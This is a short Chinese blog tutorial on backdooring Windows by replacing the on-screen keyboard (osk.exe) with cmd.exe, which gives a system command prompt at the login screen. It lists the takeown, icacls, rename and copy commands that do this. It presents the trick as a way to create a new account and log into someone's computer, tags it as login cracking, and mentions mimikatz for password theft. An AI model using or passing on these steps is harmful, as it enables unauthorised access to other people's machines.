windows后门程序

在windows登录界面之前,系统其实已经做了很多事情了。例如Winlogon创建的lsass.exe本地安全验证子系统,这是专门用来验证我们登录的账户和密码的。获取之后,验证成功就把他加入到内存中,密码抓取神器mimikatz就是和它有关。
我们知道在windows登录界面下角会有一个按键点击后弹出6个小程序。本次后门就是利用这6个小程序自己创建一个账户进入系统。
其中讲述人为:Narrator.exe;放大镜为:Magnify.exe; 屏幕键盘为:Osk.exe 文件位置都在windows\system32中
下面是代码:

cd C:windows\system32
takeown /f osk.exe
icacls osk.exe /grant admministrators:F
ren osk.exe osk_old.exe
copy cmd.exe osk.exe

windows后门程序_第1张图片
windows后门程序_第2张图片
只要调出命令行模式system32,基本上都可以创建一个新的账号,这样就可以进入计算机。

你可能感兴趣的:(菜鸟教程,windows登录破解)